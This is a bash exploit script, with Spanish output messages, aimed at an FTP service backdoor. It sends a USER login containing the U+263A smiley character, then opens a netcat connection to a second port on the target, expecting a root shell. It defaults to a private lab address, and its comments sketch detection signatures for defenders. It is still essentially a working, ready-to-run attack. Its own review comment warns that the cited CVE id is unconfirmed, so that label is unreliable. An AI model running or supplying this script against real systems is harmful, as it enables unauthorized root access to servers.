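#!/bin/bash
# Exploit for CVE-2011-2553 - FTP Service Vulnerability
# Usage: ./exploit.sh <ip> [ftp_port] [backdoor_port]
#
# NOTE(review): the CVE id above is kept exactly as the page gives it; the page
# cites no advisory, so confirm the id against the vendor advisory for the
# service under test before referencing it in a report.
#
# What the script does, as visible below:
#   1. Sends an FTP login whose USER argument is the character U+263A.
#   2. Waits two seconds.
#   3. Connects with netcat to a second TCP port, where it expects a shell.
#
# Defender's view (derived from the traffic this script produces): the
# observable pattern is an FTP USER argument containing non-ASCII bytes,
# followed shortly by an inbound connection to a second port on the same host.
# Alerting on a listener appearing on a port the FTP service does not normally
# use, and filtering inbound ports at the host firewall, covers both halves.
# The whole exchange is cleartext, so it is visible to network sensors.

# The default address is private (RFC 1918) and typical of Docker's default
# bridge network - presumably a local lab container; confirm against the lab.
IP=${1:-172.17.0.2}
FTP_PORT=${2:-21}
BACKDOOR_PORT=${3:-5000}

# ANSI colour codes for output.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly NC='\033[0m' # No Color

# Print helpers. The message is passed through %s so that backslashes in
# user-supplied values are printed literally rather than interpreted.
info() { printf '%b%s%b\n' "$YELLOW" "$*" "$NC"; }
ok()   { printf '%b%s%b\n' "$GREEN" "$*" "$NC"; }
err()  { printf '%b%s%b\n' "$RED" "$*" "$NC" >&2; }

# Returns 0 when $1 is a decimal TCP port in 1..65535.
is_port() {
  [[ "$1" =~ ^[0-9]{1,5}$ ]] || return 1
  # 10# forces base 10 so a leading zero is not parsed as octal.
  (( 10#$1 >= 1 && 10#$1 <= 65535 ))
}

# Abort early when netcat is not available.
check_nc() {
  if ! command -v nc &> /dev/null; then
    err "[!] Error: netcat no está instalado"
    echo "Instala con: apt-get install netcat" >&2
    exit 1
  fi
}

# Send the FTP login sequence to $IP:$FTP_PORT.
exploit_ftp() {
  info "[*] Conectando al servicio FTP en puerto $FTP_PORT..."

  # USER carries the U+263A character; PASS and QUIT complete the session.
  # The pipeline status is nc's exit status: it reports whether the connection
  # worked, not whether the service reacted to the USER line.
  if {
    echo -e "USER \u263A"
    echo "PASS exploit"
    echo "QUIT"
  } | nc -w 5 "$IP" "$FTP_PORT"; then
    ok "[+] Payload enviado al servicio FTP"
  else
    err "[!] Error al conectar con el servicio FTP"
    exit 1
  fi
}

# Connect to $IP:$BACKDOOR_PORT and hand the session to the terminal.
connect_backdoor() {
  echo ""
  info "[*] Intentando conectar a la backdoor en puerto $BACKDOOR_PORT..."
  ok "[+] Si la explotación fue exitosa, deberías tener shell root"
  info "[*] Conectando..."
  echo ""

  nc -w 5 "$IP" "$BACKDOOR_PORT" || err "[!] No se pudo conectar a la backdoor"
}

# Run the steps in order, with a fixed two-second pause between them.
main() {
  info "[*] Iniciando explotación..."
  check_nc
  exploit_ftp
  info "[*] Esperando 2 segundos..."
  sleep 2
  connect_backdoor
}

trap 'printf "\n" >&2; err "[!] Explotación interrumpida"; exit 1' INT TERM

# The first argument is the target address. The original usage line omitted it
# even though both examples pass it, so it is now spelled out.
if [ $# -eq 0 ]; then
  info "[*] Uso: $0 <ip> [puerto_ftp] [puerto_backdoor]"
  info "[*] Ejemplo: $0 172.17.0.2 21 5000"
  info "[*] Ejemplo: $0 172.17.0.2"
  exit 1
fi

# Reject values that nc would parse as options or that are not valid ports;
# the arguments are passed straight to nc's command line.
if [[ "$IP" == -* ]]; then
  err "[!] Error: dirección inválida: $IP"
  exit 1
fi
for port in "$FTP_PORT" "$BACKDOOR_PORT"; do
  if ! is_port "$port"; then
    err "[!] Error: puerto inválido: $port"
    exit 1
  fi
done

# Banner, printed only after the arguments have been checked.
info "[*] Exploit para CVE-2011-2553 - FTP Service"
info "[*] Objetivo: $IP"
info "[*] Puerto FTP: $FTP_PORT"
info "[*] Puerto Backdoor: $BACKDOOR_PORT"
echo ""

main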